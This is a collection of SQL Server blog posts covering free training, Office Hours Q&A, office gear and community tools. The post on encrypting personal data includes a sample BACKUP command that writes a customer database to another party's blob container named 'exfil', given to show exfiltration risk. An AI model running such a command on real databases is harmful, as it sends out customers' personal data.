Erik Darling’s Month of Free Tools Training

Over the past month (plus or minus a couple days), Erik Darling churned out dozens of posts to show how he uses different SQL Server Community Tools that are free and open source to troubleshoot SQL Server issues. You should read all of them. I did. (I also shamelessly copy/pasted this intro, plus the below, directly from his blog.)

Here’s the full list of posts:

I don’t know anybody who works harder at giving you free SQL Server training than Erik does. (That part I didn’t copy/paste from his blog.)


October is Free Fundamentals Month – And The Training Starts Now.

Indexing
18 Comments

Every weekday during the month of October, one of the modules from my Fundamentals classes will be absolutely free to watch. But you gotta watch it that day – you snooze, you lose.

This week is Fundamentals of Index Tuning. To follow along with the labs this week & next week, you’ll need SQL Server 2017 or newer, with the most recent Cumulative Update, the most recent SQL Server Management Studio, and the 50GB Stack Overflow 2013 database (10GB 7z file, extracts with 7-zip.) You don’t have to follow along with the labs, but I highly encourage it.
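
If you've never attached one of these Stack Overflow downloads before, here's a hedged sketch of what the attach looks like – the file names and paths below are hypothetical, so point them at wherever your 7z extract actually landed:

/* A hedged sketch: attach the extracted Stack Overflow 2013 files.
   The paths and file names below are hypothetical. */
CREATE DATABASE StackOverflow2013
    ON (FILENAME = N'D:\MSSQL\Data\StackOverflow2013.mdf'),
       (FILENAME = N'D:\MSSQL\Data\StackOverflow2013_log.ldf')
    FOR ATTACH;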

Make sure to keep up – next week, we’ve got Fundamentals of Query Tuning coming fast & furious.

These are recordings of live classes. In the live class, the questions & chat take place over Slack. You don’t need to join the Slack – I only monitor that chat room during the live classes. (I’m on vacation in New York at the moment, heh.)

Eagle-eyed readers will note that this isn’t all of the modules from each class, nor is it all of my Fundamentals classes. That’s because this whole thing is a diabolical mind trick, dear reader. I aim to get you hooked on the quality of my online training, and then come November 1st, when my annual Black Friday sale starts, you’ll be ready to get out your wallet – or your boss’s wallet – to get a Recorded Class Season Pass: Fundamentals, or Mastering, or the Level 2 Bundle when they go on sale.


[Video] Office Hours: Ask Me Anything at the Mediterranean Sea

Videos
0 Comments

On the last day of my Israel trip, I went through the highly upvoted questions from https://pollgab.com/room/brento and answered ’em, standing in front of the beach.

Here’s what we covered:

  • 00:00 Start
  • 00:37 AllThePartyPeople: On our server, MAXDOP=1 (not my choice); we had a poor performing SP call (called as dynamic SQL; again not my choice); Ran in SSMS; ran fine. Cleared plans & tried; Failed web; SSMS worked. Set MAXDOP=4, and both work fine. What are we missing? Why did it always work in SSMS
  • 02:09 FrankieG: Hi Brent, How do I sell the sp_Blitz scripts and, for that matter other advice you and other similar experts, have imparted that I have come to rely on, to the “owners” of the MSSQL client databases at a company where I’m the new guy?
  • 03:05 APB: Hi Brent, Just curious about your thoughts on creating a view in a data warehouse with an index (schemabinding + unique clustered index) versus creating a similar table and truncating and reloading after a nightly data refresh. Which is most efficient?
  • 05:01 Medazzaland: What criteria do you use to decide if a given long running transaction is a concern or not?
  • 06:14 Medazzaland: What are the best training resources for learning SQL Availability Groups?
  • 06:54 PB&J: Hi brant, I’m a big fan of transactions and error handling in stored procedures. Developers say they implement try/catch and transactions in the application code so they don’t want to add it on the SP as well. Is it indeed duplicate or handling errors in SQL has its benefits? Tnx
  • 08:00 Ramil: Hi Brent! App controls a lot of things like amount of database files – only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 300gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.
  • 10:05 bamdba: Hi Brent, I’ve inherited a SQL estate where I have multiple SQL HADR (2012 to 2017) on a single OS and with data files on mount points. Any suggestions on how can I consolidate these servers without migrating to new ones?
  • 11:43 Mehmet: Do untrusted foreign keys adversely affect query plans?
  • 12:03 Mehmet: Have you ever experienced an ailing SQL Server that sent out so many failure simultaneous notifications that it took down the mail server?
  • 12:49 Timbalero: Hi Brent, apart from inaccurate stats, UDFs and table variables, what other reasons can make the CE produce estimates of exactly 1 row? Can multiple joins have something to do with it?
  • 14:56 Ingibjorg: Do you have any recommended guidance for creating / optimizing new VM configuration for SQL Server 2019 Standard in an Azure VM? Is it any different than bare metal new server configuration?

Vegas Home Office Tour

Home Office
17 Comments

I’ve been teaching online from home for years, and you’d probably think my office would keep growing and growing – but actually, my setup has gotten a lot smaller since the last time I blogged about it. I don’t really need space in order to work, and I kinda wanna incentivize myself to get out of the office when my work is done.

I designed my Vegas home office around the side camera view that the audience sees while we’re doing live Q&A and chatting in Slack (the window at the top right of the stream):

I wanted a lively view with a bunch of personal stuff in the background (although blurred a little with good bokeh.) Here’s how it looks behind the scenes – the entire wall to the left is painted chroma key green so I can do greenscreen work:

And here’s the camera I’m staring at when the side view is on:

When I turn back to the computer to continue presenting, here’s what the setup looks like:

Desk: Vari Standing Desk – I went for the smallest stable standing desk I could find. It’s got just enough room for my monitor, laptop, keyboard, trackpad, and Stream Deck, but no more than that. It’s quite the departure from my giant NextDesk Terra Pro, which is down in the garage now.

Chair: Vari Active Seat – I’ve used an Aeron on wheels for years, but I wanted something that was more of a bar stool height. I was really curious about the Active Seat because it doesn’t have wheels, and instead lets you naturally move around in a small area. I thought for sure I’d fall over – but it’s been great! I love it, and I can sit on it for hours.

Laptop: MacBook Pro 16 – I’m on the 2021 model with the M1 Max processor and 64GB RAM. The Apple Silicon processor is everything you’ve read about in reviews: crazy fast and completely silent, even when I’m streaming and recording videos. The ARM processor can’t run SQL Server in Windows VMs, so I use the cloud for that instead.

Monitor: Gigabyte M34WQ 34″ (RTings) – Around $500 for 3440×1440 resolution and a 144Hz refresh rate. I like the way Apple’s Pro Display XDR looks, but I’m not about to spend 10X more in order to see colors more vividly when I’m partially colorblind anyway.

Control panels: Elgato Stream Deck XL – A vital, vital part of my streaming workflow with keys to trigger all kinds of stuff that I use while streaming. I use two of these, one on the right side of my desk and one on the left, because regardless of what I’m doing and where I’m standing, I wanna be able to trigger events.

Elgato Stream Deck

Slack chat display: Apple iPad – In my classes, the audience can ask questions and chat with each other via Slack. I need to be able to see that chat at all times so I can respond immediately to questions or feedback. When I’m doing PowerPoint presentations full screen, I need one clean monitor with the PowerPoint display that the audience will see, and the other display is PowerPoint presenter view. I could have added another monitor to my desktop, but I just didn’t wanna take up much space, and an iPad is perfect for this.

Green screen camera: Sony ZV1 – This is actually a big step down from my previous streaming setups. When I’m doing green screen work, my image is a small part of the entire screen, so I don’t need a really good camera here. I just need something better than the typical USB webcam, because those don’t pick up enough color details for green screen work. The ZV1’s small sensor is good enough. I use the HDMI output, and plug that into an Elgato Cam Link 4K. I have a Rode VideoMic Go on the top of this camera as an emergency microphone in case my wireless headset goes out during a class. The mic is always on, so if my regular mic dies, I can just unmute the ZV1’s audio in OBS, and we can keep right on going.

Side camera: Sony ZV-E10 with Sigma 16mm lens – While I don’t need a high quality green screen camera, the side view camera has to be lusciously detailed. When I switch to the side camera, I’m having a discussion with the audience, and I take up the whole screen. I want the background to be defocused. This camera’s HDMI output also gets plugged into an Elgato Cam Link 4K. If you need to plug multiple Cam Links into a laptop, I don’t recommend routing them through a dock – instead, get a simple USB 3.1 hub. When I run too much through a dock, the Cam Links end up dropping offline.

Microphone: DPA headset microphone plugged into a Sennheiser AVX transmitter, into a Focusrite Scarlett – This setup is total overkill, but I really like the flexibility of being able to move around a lot while I do green screen work, and not have to worry about tripping over cables.

Lighting: a hodgepodge. A pair of Neewer 12.9″ lights for the desk, and a couple of older Neewer lights to light the green screen. I really wanted to use Elgato Key Lights so that I could automatically turn them off & on when I changed camera scenes and put the stream on break. However, the Key Lights’ WiFi connections were wildly unreliable for me. The Neewer lights are actually mounted to Elgato Key Light stands because those are nice hardware, but the Key Lights themselves are sitting in the closet, unused.

Streaming software: OBS. I’ve written about how I use OBS for streaming and training classes, and how to make online streams fun and interactive with OBS scenes. For video delivery, I use Mux for private classes, Twitch for public streams, and YouTube for public stream replays.

If you’ve got questions about my office setup, feel free to ask away in the comments!


Free Live Webcast: Why is One Query Sometimes Slow and Sometimes Fast?

SQL Server
2 Comments

Sometimes the exact same query goes slow out of nowhere. Your current fix is to update statistics, rebuild indexes, or restart the SQL Server. It works, but you don’t know why.

The single most common reason is parameter sniffing. SQL Server “sniffs” the first set of parameters for a query, builds an execution plan for it, and then reuses that same plan no matter what parameters get called. It’s been the bane of our performance tuning for decades.
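
If you want to see it in action before the webcast, here's a rough sketch using the Stack Overflow Users table – the index, procedure name, and parameter values are just illustrative:

/* A rough sketch of parameter sniffing, assuming the Stack Overflow Users
   table and an illustrative index on Location: */
CREATE INDEX IX_Location ON dbo.Users (Location);
GO
CREATE OR ALTER PROCEDURE dbo.usp_UsersByLocation
    @Location NVARCHAR(100)
AS
SELECT Id, DisplayName, Reputation
FROM   dbo.Users
WHERE  Location = @Location;
GO
/* The first call compiles a plan for a rare value (index seek + key lookups)... */
EXEC dbo.usp_UsersByLocation @Location = N'Iceland';
/* ...and the second call reuses that same plan for a very common value,
   even though a different plan would have been cheaper. */
EXEC dbo.usp_UsersByLocation @Location = N'India';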

In this one-hour session on Thursday, October 20th, I will explain:

  • How it happens
  • How SQL Server 2022 is trying to fix it
  • How you can work around emergencies in the meantime

Thanks to the session’s sponsor, Pure Storage, the first 200 folks to register and attend the entire webinar will get a $10 gift card for lunch. Get your lunch and learn on for free.


Buckle Up: October is Free Fundamentals Month!

Company News
40 Comments

How about some completely free SQL Server training?

Every weekday during the month of October, one of the modules from my Fundamentals classes will be absolutely free to watch. But you gotta watch it that day – you snooze, you lose.

To prep, block out a 30-minute window on your calendar, right now. Put a label on it, and bookmark this page. Each day, come back to this page, click on the day’s module, and get your learn on. Here’s what you’ll learn:

Fundamentals of Index Tuning

To follow along with the labs this week & next week, you’ll need SQL Server 2017 or newer, with the most recent Cumulative Update, the most recent SQL Server Management Studio, and the 50GB Stack Overflow 2013 database (10GB 7z file, extracts with 7-zip.) You don’t have to follow along with the labs, but I highly encourage it.

Fundamentals of Query Tuning

Fundamentals of Columnstore

For this class, there aren’t hands-on labs, and you’re not expected to follow along. Columnstore is about bigger data, so I use the 2018-06 ~180GB copy of Stack Overflow (info page.) You definitely don’t need to grab that, but I’m mentioning it here in case you do want to follow along with the demos.

Fundamentals of TempDB

For this class, you don’t have hands-on labs, but if you want to follow along with the demos, I’ll be using the same 50GB Stack Overflow 2013 database we used during the first two weeks.

Eagle-eyed readers will note that this isn’t all of the modules from each class, nor is it all of my Fundamentals classes. That’s because this whole thing is a diabolical mind trick, dear reader. I aim to get you hooked on the quality of my online training, and then come November 1st, when my annual Black Friday sale starts, you’ll be ready to get out your wallet – or your boss’s wallet – to get a Recorded Class Season Pass: Fundamentals, or Mastering, or the Level 2 Bundle when they go on sale.

These are recordings of live classes. In the live class, the questions & chat take place over Slack. You don’t need to join the Slack – I only monitor that chat room during the live classes. (I’m on vacation in New York at the moment, heh.)

Now go block out a recurring 30-minute window in your calendar every weekday in October. See you in class!


[Video] Office Hours: Six-Minute Speed Round

Videos
1 Comment

The morning after the Data TLV Summit in Tel Aviv, I stood out on the balcony and answered a few of your questions from https://pollgab.com/room/brento, rapid-fire style:

 

Here’s what we covered:

  • 00:00 Intros
  • 00:47 cyrpl: Hi Brent from PEI, Canada. A support person told me today that when creating a table, an ID column should almost be a default for every table. Do you agree? 98% of our tables do not have ID fields. Would adding ID fields to busy tables generally help query performance?
  • 01:15 Nas: What is quickest and short downtime way of migrating 7TB database on new storage old SAN (DELL) new SAN(HPE)?
  • 02:19 Simon Frazer: Have you come across scenarios where you feel SQL Server would’ve benefited from allowing more than 1 8k page for statistics?
  • 02:38 Ingibjorg: Do Postgres DBAs tend to have higher pay ceilings than MSQL DBAs?
  • 03:12 Ingibjorg: What tools / tests do you like to use when performance testing the network layer for a new SQL server?
  • 03:32 sp_blitz_says_myboss_is_a_rocket_scientist: in what cases should we create statistics ourselves?
  • 04:33 Does Basically Anything: Hi Brent! How would you recommend tuning when faced with a cursor query that has so many iterations that you can’t pull an actual execution plan when running it because it overwhelms SSMS?
  • 05:06 Ingibjorg: Management uses KPI’s to judge the developers. Management also wants KPI’s to evaluate the SQL production DBA. In addition to meeting RPO/RTO objectives, what are good / bad KPI’s for this? Tickets closed, peer review scores, etc?
  • 05:47 Mehmet: At what point should you ask dev to introduce app layer caching for a query that is rapidly re-executed?

[Video] Office Hours in Tel Aviv, Israel

Videos
2 Comments

Before speaking at the Data TLV Summit, I sat by the Mediterranean Sea and discussed the top-voted questions you posted at https://pollgab.com/room/brento.

Here’s what we covered:

  • 00:00 Start
  • 00:55 Manikandan GS: As postgres being one among the RDBMS lane, do you think postgres is having more features and flexibility compared to MS-SQL Server?
  • 02:46 PaginationWoo!: Hi Brent. I use Ola’s script to update stats nightly. Other than time spent and % CPU used, is there a case where updating stats with fullscan would be a bad thing? I’m fortunate in that I have a long maintenance window. If I have time for fullscans, wouldn’t it be worth doing?
  • 04:42 Adza: I had the thought of creating a date table with all dates ranging from 2010 to 2070 and have a smallint key for each date. Then in my tables I can store smallint values instead of actual dates. This could be a huge data saver (2 bytes vs 3 bytes). Smart or stupid?
  • 05:53 Eyes Without a Face: Is there a portable version of the First Responder Kit? Our customers are mainly banks and they are not keen to install Stored Procedure. Not even the First Responder Kit
  • 06:44 Dawson from Dawsons Creek: Do you have any clue why Microsoft suggests to use a windows collation for new development work but the default server collation for English(US) is still a SQL collation? For all other Windows locale the default server collation is a windows collation.
  • 08:07 StillLearning: Hello Brent, as a Dev DBA I’ve recently became increasingly frustrated with computed columns and their limitations (filtered index…). Should I advise the dev teams to refrain from using them and do the computation in the app instead ? Thanks
  • 09:26 Haurun: What are the pros/cons of installing Ola Hallengren maintenance script tables / sp’s in master database vs some kind of maintenance db?
  • 10:42 Milind: Hi Brent, Thanks for your time. During execution of certain queries or SPs I am observing high logical reads. Where should I look to make sure it is appropriate or required improvement? Unfortunately, I haven’t completed all the training modules and asking this question.
  • 12:06 TheCuriousOne: Hi Brent! If you have to work with local SSDs in a server for your SQL setup, is it better to have one big array with OS side logical separation through partitioning or to have physical separation by setting up smaller disk-sets with various RAID configurations?

New Online Class: Running SQL Server in AWS and Azure

Cloud Computing
6 Comments

You’re used to managing your own SQL Servers in VMs, but now they’re asking you to work with the cloud.

You’re already comfortable installing, backing up, and performance tuning “regular” SQL Servers, and you just need to catch up with what’s different about the cloud.

You don’t want hype – you just want honest opinions from someone who doesn’t work for a cloud vendor.

In this recorded class, you’ll learn:

  • How to assess your current workloads
  • How to pick the right VM type for your workload
  • How to size storage for performance, not just capacity
  • How to assess wait stats in cloud VMs
  • How to back up directly to cloud-native file systems
  • Where Azure Managed Instances & AWS RDS make sense

I’m Brent Ozar, and I’ve been managing client VMs in the cloud for over a decade. I’ll get you up to speed with unbiased facts, not hype, and save you valuable time as your career transitions to the next level.

To get started saving your company time and money, get the course for $195. Folks with a Recorded Class Season Pass: Fundamentals or a Level 2 Bundle can start watching the class right now under their account. Enjoy!


Office Hours: Gif Reactions Edition

Some of the questions y’all post at https://pollgab.com/room/brento are open-and-shut cases. I was going to do a one-word-answers edition, but I think this is even better: gifs.

GI Joe DBA: Thoughts about IT professionals Unionizing? IT professionals are in demand. Because of our demand, should we use this leverage to unionize, raise the bar, force better health benefits, retirement benefits, etc for ALL.. US Citizens? Ever discuss this with colleagues?

Rudy: Love the statistics parser web site. Will it remain around for the foreseeable feature? If not, is the source code freely available? 

Will Marshall: What are the common mistakes to avoid when coding sprocs that will crash SSMS during execution / debugging?

DBA_Mufasa: Salut Brent! Does using filegroups really help distribute I/O throughput and minimize disk contention if the ndf files for those filegroups still reside on the same logical volume?

Justsin: Do you ever like to use “SET STATISITCS XML ON” for troubleshooting stored procedures?

40 oz Coffee Breakfast: Do you have any experience with using DDBoost as a backup solution? My friend is currently using Ola’s scripts to backup to a Data Domain as a CIFs share. Storage team asks for us to use DDBoost but there is a concern about losing granularity of restores.

Dan: Any insight into why DB restores are unbelievable painful within Azure SQL, we seem to be averaging between 20-80 minutes with < 50% success on a less than 200mb db and results are still mixed regardless of if we do point in time or full restores.

Sql Padawan: Hi Brent! I’ve really enjoyed your Mastering courses. Especially the stories and analogies you use (like the one about pets wearing disguises). What do you recommend to create a successful online course? (btw, I’m not planning to create SQL Server courses 😀 )

Menahem: Does high plan cache turn over due to improper query parameterization adversely affect commercial SQL monitoring software?

Bart: Hi Brent. What’s the best way to convert UTC datatime to local datetime/date. I’ve been using this: CONVERT(DATETIME, SWITCHOFFSET(CONVERT(DATETIMEOFFSET, mydate.MODIFIEDDATETIME), DATENAME(TZOFFSET, SYSDATETIMEOFFSET()))) AS LOCALDATETIME

Will Marshall: What are the pros/cons of letting SQL create the temp table via SELECT INTO (i.e. SELECT into #MyTempTable) vs explicitly creating the temp table then inserting into it?

YouGottaDoWhatYouGottaDo: Hi Brent, do you know of a list of former “Best Practices” for SQL Server that have now become useless or even dangerous/harmful (due to engine/OS evolution)?

Menahem: Do any of your clients run their primary AG / HA SQL2019 node on prem and their secondary 2019 AG / HA node in Azure? Is this a bad idea?

And I’ll leave you with a bonus gif:


Most DBAs Say They’re Encrypting Personally Identifiable Data. Most.

Despite the continuous stream of data breaches, ransomware, and GDPR violations, some companies still aren’t encrypting personally identifiable information (PII) inside their databases or backups.

I see this all the time when working with clients, but I can’t exactly talk about that or give numbers, so I decided to take a highly unscientific poll on Twitter. I figure if DBAs are sitting around on social media, they’re probably done with all the important parts of their job. The 147 votes came in:

Hoping for more upbeat news, I also asked on LinkedIn, a more professional social media network, where maybe people do their jobs better? I’m just guessing, who knows:

The story was better, but it’s still sketchy. Depending on where you ask, one in five to one in three shops isn’t encrypting their personally identifiable information at all.

I actually have a hunch the number is much worse because in a social media poll, we’re just taking folks at their word. In reality, when I’ve lifted the covers to dig a little deeper with the business, we’ve found things like production data being restored to development servers, and stored unencrypted.

When I’ve discussed this with clients, some folks even say, “Yes, we’re encrypting data – we use encryption at rest at the storage level. Everything that hits disk is encrypted automatically.” Okay, great – now what happens when someone takes a backup? They can copy that backup anywhere they please, like writing directly to someone else’s Azure Blob Storage account or to Amazon S3, and you won’t get any errors or warnings. Storage-level encryption doesn’t stop data exfiltration.
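
To make that concrete, here's a hedged sketch of what that exfiltration can look like – the storage account, container, and database names are made up, and it assumes a SAS credential for the container already exists:

/* A hedged sketch: a native backup written straight to a blob container
   someone else controls. Storage-level encryption at rest does nothing
   to stop this. */
BACKUP DATABASE CustomerData
TO URL = N'https://someoneelsesaccount.blob.core.windows.net/exfil/CustomerData.bak'
WITH COMPRESSION, STATS = 10;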

It’s okay if you don’t have all of the answers, but as a database administrator, you should start by asking a few questions:

  • Where are we storing personally identifiable information?
  • Is that data encrypted, and how?
  • If it’s not encrypted, what’s the plan to get it encrypted? Is the business waiting on me to do something?
  • Has anyone given my manager and the company’s security & compliance departments the answers above, in writing?

Asking those questions is the first step to getting your company to a safer place.


[Video] Office Hours: Ask Me Anything About SQL Server and Azure

Videos
5 Comments

Got questions about the Microsoft data platform? Post ’em at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. Today’s episode finds me in my home office in Vegas:

  • 00:00 Intros
  • 02:10 GeorgeDAX: Hello Brent, I’m a dealing with a huge sales table which contains around 500 columns with 50m rows. Business asks to add even more columns in the table. Should I break the table or keep adding columns to the same one? Performance wise, what’s the best approach?
  • 04:47 Brynjar: Do you have a suggested max column limit when designing new tables that require fast queries?
  • 05:58 Manuel Labour: What is the largest stored proc you ever had to optimize? How long did you spend on it?
  • 07:24 Yavin: When analyzing SQL memory use, what are healthy / unhealthy utilization ratios for MEMORYCLERK_SQLBUFFERPOOL, CACHESTORE_SQLCP, MEMORYCLERK_SQLGENERAL?
  • 08:21 Eduardo: Is it safe to run sp_blitzindex on a busy OLTP server (3000+ batches per second) during peak business hours or should this be done after hours?
  • 10:22 3rdNormalForm: HEAPS & Vendor Packages. I have a 43 million row table called transactionxlog with no keys and no CX. sp_blitzcache shows 7 queries against this table with costs of 883. I took the recommend composite index and made it into a clustered index. [UNIQUIFIER] what is it?
  • 12:05 DB_Architect_Chick: Hi Brent. I’m designing a new database for 50k inserts/selects (minimal updates) per hour. I am doing my best to make mature design decisions, but with no actual data to test against, do you have any suggestions for establishing an effective initial index strategy?
  • 15:22 Eduardo: What is your opinion of Intel QAT backup compression in SQL 2022?
  • 17:34 Vilhelms: Is there a good way to know when a query caused an auto stats update and how long the auto stats update took?
  • 19:39 Pete S: What is your opinion\thoughts on the “SQL Graph Database” feature that was introduced in SQL Server 2017? Have you worked with any clients that use it in production OR is this another “copy-cat” feature to keep up with the database Jones’?
  • 20:57 RaduDBA: Mr. Brent, with all the cloud solutions and cloud databases that take over the data landscape, like datawarehouses, lakehouses etc. is there still room for SQL Server and traditional on-prem databases? I work as a DBA and do a lot of performance tuning. Is my career doomed?
  • 23:43 cyrpl: Brent, can you suggest a stored procedure source control tool. We have gitlab for code source control but we specifically want to track all changes to SQL Server stored procedures.
  • 25:56 YouGottaDoWhatYouGottaDo: Hi Brent! Have you ever encountered a very toxic work environment (dictator-boss, widespread discontent etc.) that created problems for you during your consulting work (even 1-day consultancy)? How did you handle this?

Community Tools Month: Using sp_WhoIsActive to Catch ASYNC_NETWORK_IO

Monitoring
10 Comments

When your SQL Server’s top wait stat is ASYNC_NETWORK_IO, that indicates SQL Server is waiting on the app to ask for the next part of the result set.

This is a real pain in the rear to troubleshoot because these waits often last for a really short duration each time – think milliseconds, not seconds. It’s death by a thousand cuts.

The easiest way to get a quick idea of what’s happening is to run sp_WhoIsActive (GitHub – releases) repeatedly, with no pauses in between:

Here, I’m running a workload with a lot of short queries running simultaneously. If I only run sp_WhoIsActive occasionally, I don’t see much activity – just a query or two now and then, and they’re rarely waiting on the network. However, if I run it several times in a row, right away:
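
A minimal sketch of what "several times in a row" looks like in SSMS – the GO 10 batch-separator trick just reruns the same call back to back:

/* Fire sp_WhoIsActive back-to-back so short-lived ASYNC_NETWORK_IO waits
   have a chance to show up in the results. */
EXEC sp_WhoIsActive;
GO 10   -- SSMS repeats the batch above 10 times with no pause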

Then I can get a fast, seat-of-the-pants idea of which queries are waiting on networking. I can also scroll across to the right in the result set and see which app it’s coming from, which servers, which logins, etc.

This isn’t an exact science by any means, but when I’m working with a client, it helps me quickly get a rough idea of what’s going on. It helps me start a conversation about the kinds of queries we’re running, how much data we’re bringing back (both in terms of rows and columns), and find out whether the app servers might be underpowered or swapping to disk.

Clients have said things like:

  • “Oh, we had no idea that app was bringing back all of the columns, and that’s problematic since we added a few XML/JSON/MAX columns in the table since that query was written.”
  • “Oh, we had no idea that application was taking so long to digest the results of those queries. We can give that app server more memory.”
  • “Oh, we had no idea that it was bad if we ran the database server in one data center, and the app servers elsewhere.”

ASYNC_NETWORK_IO isn’t necessarily a bottleneck for SQL Server – fixing the above problems may not make a big performance difference for other users – so solving it is often relatively low-value work during the engagement. sp_WhoIsActive helps me dedicate an appropriately small amount of time & effort to the problem, and then move on to the bigger problems.


[Video] Office Hours: Hotel Balcony Edition, Part 2

Videos
0 Comments

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered:

  • 00:00 Introductions
  • 00:59 Haydar: What tools do you like to use when troubleshooting azure sql db query performance issues?
  • 01:57 The Midhight Idol: Does the glitz and glamour of Vegas ever wear off or get old?
  • 02:48 Haydar: Would a PostgreSQL version of constant care see the same demand and success?
  • 03:23 Walcott: Which Intelligent Query Processing features do you like or dislike in SQL Server 2019 and 2022?
  • 04:18 Delete_Rule:Cascade: Good day Brent! I’m new to data warehousing and I was wondering what your thoughts are on using SSIS for ETL operations? Are there similar products out there that are better or is SSIS the go-to product?
  • 05:08 Nikolajs: What is the largest number of tenants you have seen inside a single multi-tenant SQL server instance? Did this pose any unique challenges?
  • 07:00 Morty: What are your thoughts on new SQL 2022 ledger functionality and it’s use cases?
  • 09:27 MyFriendtheDBA: I’m getting excited about PASS Summit this November (my first). Being a Seattle-neophyte, any restaurant/food truck/personal kitchen recommendations for the trip?
  • 11:42 Nomad: My friend copied a database with Windows authentication using the “detach and attach” method. The .mdf and .ldf file permissions changed and reattaching the database failed. Why did the file permissions change and what steps would you take to resolve this issue?
  • 12:36 Madiha: What’s your opinion of the query plan viewer in Azure Data Studio?
  • 14:13 CronullaStingray: Hi Brent. I ran blitzindex and got “Indexaphobia: High Value Missing Index” which I created without modifications. It’s been over a month and the dm_db_index_physical_stats user_seeks and user_scans are both showing 0s. But blitzindex still says I need to create it. Why is that?
  • 15:33 Anatoli: How do you know if query store is a good / bad fit for your SQL server 2019 enterprise instance?
  • 16:30 Anatoli: What are the risks of long running native SQL backups?

[Video] Office Hours: Hotel Balcony Edition, Part 1

Videos
1 Comment

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered today:

  • 00:00 Introductions
  • 00:25 Kebros: Hi Brent.My manager wants me to summarize sql health into a number 1-100 for all 50 production Servers.This is idiotic but just for Banter, what health metric (Eg I/O) will you advise me to use and average out (even if it doesn’t paint a whole picture) so I can feed my family.
  • 02:08 SwissDBA: Hi Brent, I inherited a database of 2 TB with 355 data files. How would you check (and prove to the business) if the database has too many data files? Even the biggest file is just 55 GB big and I believe the DB could be faster with much less data files.
  • 04:32 Britney: What are the common strategies you see used for recovering from “Oops” queries?
  • 05:40 LifeExtinguisher: Can rcsi improve backup speed? Considering backup reads the whole db and saves in bak file, and reads are routed to tempdb for older values, not needing shared lock on resource that already is booked by some other exclusive lock
  • 06:33 Sussudio: What tools / techniques do you recommend for generating large sudo realistic synthetic data loads for performance testing in the lower SQL environments?
  • 08:27 Dilara: When are SQL Server questions better suited for stackoverflow.com vs dba.stackexchange.com? Which forum has less snark?
  • 09:25 Lieutenant Dan: What are the top 4 SQL conferences ranked in order?
  • 11:33 Fyodor: What is your opinion / experience with using client side profilers like C# MiniProfiler to monitor SQL query performance?
  • 13:14 Does Basically Anything: Hi Brent! Regarding sp_databaserestore. I was wondering if you knew of anyone who wrote something open source that utilizes it for automating testing restores from multiple servers, multiple databases. Any clickholes I could venture down before I start building something myself?
  • 14:28 happydba: do you have a video of the baby sea turtles yet?!? 😀
  • 15:14 Haydar: What are your preferred scripts / tools for monitoring Always On latency?

Community Tools Month: Choose Your Character

This month on the blog is Community Tools Month, and I’m going to be talking about some of the most useful and influential tools out there.

You can’t learn them all – *I* can’t learn them all – because there just aren’t enough hours in the day to do your work, keep your skills sharp, take care of yourself, and take care of the ones you love.

So this month, think about a couple of things:

  • Can I use this tool to get my existing tasks done faster?
  • Do I want to keep doing these tasks in my next job?
  • What tasks do I wanna do in my next job?
  • Can I learn this tool to help me get my next job?

With that in mind, here’s something I use all the time with clients when I’m asking how many staff they have to support a particular application:

There are certainly more data-related jobs – BI developer, architect, data scientist, data engineer, etc – but let’s start here.

I know there are gonna be readers who say, “I do all of those tasks.” Sure you do – but you don’t do them well, and if you think you do, you’re deceiving yourself about what “well” means for any of those columns. You’ll be in for a world of surprise when you go to interview for a senior position in any of those columns, because senior = specialist.

With that in mind, for each of those columns, today I’m going to list a tool that I think is important for your next job.

If you want your next job to be Production DBA,
you should be learning dbatools.

In your current position, you may not manage enough servers to justify it. You might be content doing your work one server at a time, with the SSMS GUI and T-SQL. However, the Production DBA role at small companies will continue to evolve over the next decade, and your skills need to be ready for your next job. You want bigger responsibilities, and that means accomplishing more tasks, more quickly.

Get these two books and read them in order:

You’ll learn how the open source dbatools module helps you manage more servers, in less time, while making fewer errors.

Like any new tool, it’s going to be slower going for you at first – probably even for months. But when it’s time to get your next job, the one managing more servers in more environments, you’re going to be able to use the exact same techniques that you’ve already been practicing at your smaller job.

If you want your next job to be a Development DBA,
you should be learning sp_HumanEvents.

I’m not telling you to learn Extended Events – you can, sure, but you don’t need to. Erik Darling’s sp_HumanEvents automates the data collection AND, here’s the important part, the analysis, for the most common long-term problems that performance tuners need to solve. I don’t use Extended Events myself directly, ever, but I use sp_HumanEvents all the time.

To understand how powerful and useful it is, start with Erik’s 10-minute video on using it to troubleshoot blocking, compiles, and recompiles.

Then, go get it and read the documentation.
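
To give you a feel for it, here's a hedged example of the kind of call you'd make – double-check the current documentation for the exact parameter names and defaults before relying on this:

/* A hedged example: sample blocking for 30 seconds and get back an
   already-analyzed result set. Verify parameters against the docs. */
EXEC dbo.sp_HumanEvents
    @event_type     = N'blocking',
    @seconds_sample = 30;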

If you want your next job to be developer,
you should be learning MiniProfiler.

When your team builds software-as-a-service (SaaS) applications, sooner or later, you’re going to run into a problem with server performance analysis. SQL Server has historically struggled with this, and it’s getting even worse in SQL Server 2022.

Because of these problems, you’re going to be a much more effective developer if you can implement the free open source MiniProfiler to track which parts of your application are having performance problems, and which queries are causing those problems.

I’m not saying you have to be the one who analyzes the data, reads the queries, and tunes them. However, as a developer, you are the one who’s going to have to implement the data-collecting solution. This need is even more important in the cloud where performance costs pile up every month, and the urgency to fix ’em becomes even higher.

All 3 of these have something in common.

They’re on GitHub.

GitHub itself isn’t a community tool, but in 2022, GitHub is the tool where community open source happens. I’m not saying you have to learn GitHub or use it for your own code – it can be a real pain in the keister. But if you learn the basics of how to clone a project locally and keep it up to date, you’ll likely be better off no matter what your future job entails.


Office Hours, Short Text Answers Edition

Not all of the questions y’all post at https://pollgab.com/room/brento require long, thought-out answers. Some are just one-line specials, like these:

F’legend: Hi Brent, in reply to a question talking about database restores for 1TB+ you also touched on scrubbing or synthetic data as a way to populate dev environments. Are there any resources/tools you would suggest for these approaches?

Read this and the comments on it.

On Another Beach Somewhere: I am using multiple instances of SQL on the same VM. Brent says that’s a bad idea… lets pretend I have a good reason. How does Min/Max Memory come into play? Can I set both instances to the same “Max” and let them compete for memory or do I need to allocate a portion to each?

Congratulations. You just discovered one of many reasons why I told you it was a bad idea. Just wait til you discover CPU contention.

